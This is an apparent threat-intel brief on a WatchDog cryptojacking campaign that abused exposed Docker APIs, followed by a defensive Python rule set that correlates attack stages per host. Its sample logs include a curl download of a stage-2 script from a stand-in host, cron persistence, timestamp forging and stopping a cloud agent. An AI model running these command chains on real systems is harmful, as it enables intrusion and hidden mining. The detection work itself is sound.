Cryptojacking Group WatchDog Attacks Cado Labs
Industry: N/A | Level: Tactical | Source: Cado Security
Researchers at Cado Labs report a cryptojacking attack observed on the company's honeypot. The attack is attributed to the cryptojacking group WatchDog, a rival of TeamTNT, another known threat actor targeting cloud environments. The campaign began by exploiting a publicly exposed, misconfigured Docker API on port 2375: the daemon was left in its unsecured default configuration, allowing unauthenticated access. Once a foothold was established, the attacker created a new Alpine Linux Docker container and set up persistence with a cron job. A first-stage shell script checks whether the system is already infected, lists running processes and host configuration, downloads a second-stage payload, and checks user permissions, since the campaign requires root. The second-stage shell script manipulates the system's timestamp and disables services such as the Alibaba Cloud Agent. The XMRig miner payload is then dropped on the compromised host, with a system service created for persistence. A third-stage payload conducts network scanning to identify hosts to pivot to and drops two final scripts that propagate the attack further into the victim's network.
Anvilogic Scenario:
- WatchDog Cryptojacking Attack
Anvilogic Use Cases:
- Publicly exposed Docker API
- New Docker Container
- File Download (Unix)
- Crontab Job Scheduling (Unix)
- Timestamp Manipulation
- Rare shell script execution
- Service Stop Commands
- File Modified for Execution
- Linux Enumeration Techniques
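The use cases above only fire as a meaningful scenario when several of them line up on the same host. The following is an added example, not code from Cado Labs or Anvilogic, showing how a defender might correlate them: a small rule set matches shell command lines from process-execution logs against the stages of the chain described above, groups hits per host, and flags hosts where three or more distinct stages appear. The `host=... user=... cmd="..."` log format, the regexes, and every sample line (including the service name `cloud-agent.service` and the URL `example.invalid`) are constructed assumptions; the rule labels reuse the use case names above for readability. The "Rare shell script execution" use case is left out on purpose, since it needs a frequency baseline rather than a pattern.

```python
import re
from dataclasses import dataclass

# Assumed log layout (constructed for this example), one process execution per line.
LOG_RE = re.compile(r'host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd="(?P<cmd>.*)"$')


@dataclass(frozen=True)
class Rule:
    name: str            # label, reusing the use case names above
    pattern: re.Pattern  # matched against the command line only


# Hypothetical detection rules, one per stage of the chain. Patterns are
# deliberately narrow so the example stays readable; tune them to your telemetry.
RULES = [
    Rule("Publicly exposed Docker API",
         re.compile(r"\bdockerd\b.*tcp://0\.0\.0\.0:2375")),
    Rule("New Docker Container",
         re.compile(r"\bdocker\s+(run|create)\b")),
    Rule("File Download (Unix)",
         re.compile(r"\b(curl|wget)\b.*https?://")),
    Rule("Crontab Job Scheduling (Unix)",
         re.compile(r"\bcrontab\b|/etc/cron")),
    Rule("Timestamp Manipulation",
         re.compile(r"\btouch\s+-[a-z]*[rt]\b|\bdate\s+-s\b")),
    Rule("Service Stop Commands",
         re.compile(r"\bsystemctl\s+(stop|disable)\b|\bservice\s+\S+\s+stop\b")),
    Rule("File Modified for Execution",
         re.compile(r"\bchmod\s+([ugoa]*\+x|[0-7]*[1357])\b")),
    Rule("Linux Enumeration Techniques",
         re.compile(r"\b(uname\s+-a|ps\s+-?[ae]|whoami|cat\s+/etc/passwd)\b|^id\b")),
]

# Constructed sample telemetry: one host shows the whole chain, one host is benign.
SAMPLE_LOGS = [
    'host=web01 user=root cmd="dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock"',
    'host=web01 user=root cmd="docker run -d alpine:latest sh"',
    'host=web01 user=root cmd="curl -fsSL http://example.invalid/stage2.sh -o /tmp/stage2.sh"',
    'host=web01 user=root cmd="chmod +x /tmp/stage2.sh"',
    'host=web01 user=root cmd="echo * * * * * /tmp/stage2.sh | crontab -"',
    'host=web01 user=root cmd="touch -r /bin/ls /tmp/stage2.sh"',
    'host=web01 user=root cmd="systemctl stop cloud-agent.service"',
    'host=web01 user=root cmd="ps aux"',
    'host=web01 user=root cmd="id"',
    'host=db01 user=alice cmd="ls -la /home/alice"',
]


def parse_line(line):
    """Return {'host', 'user', 'cmd'} for a well-formed line, else None."""
    m = LOG_RE.search(line)
    return m.groupdict() if m else None


def match_rules(cmd):
    """Names of every rule whose pattern matches the command line, in RULES order."""
    return [rule.name for rule in RULES if rule.pattern.search(cmd)]


def stages_by_host(lines):
    """Map each host to the set of distinct stages observed in its command lines."""
    by_host = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line: skip rather than crash the pipeline
        by_host.setdefault(rec["host"], set()).update(match_rules(rec["cmd"]))
    return by_host


def suspicious_hosts(lines, min_stages=3):
    """Hosts where at least min_stages distinct stages of the chain were seen."""
    return sorted(h for h, stages in stages_by_host(lines).items()
                  if len(stages) >= min_stages)


if __name__ == "__main__":
    for host, stages in stages_by_host(SAMPLE_LOGS).items():
        print(f"{host}: {len(stages)} stage(s) -> {sorted(stages)}")
    print("flagged:", suspicious_hosts(SAMPLE_LOGS))
```

Correlating on distinct stages per host rather than on any single hit is the point: a lone `crontab` edit or `chmod +x` is routine administration, while a Docker daemon listening on `tcp://0.0.0.0:2375` followed by a download, a cron entry, a timestamp reset and a service stop on the same machine is the shape of the campaign above. In production the grouping would also be bounded by a time window and the exposed-API rule would more usefully come from the daemon's own configuration than from a command line.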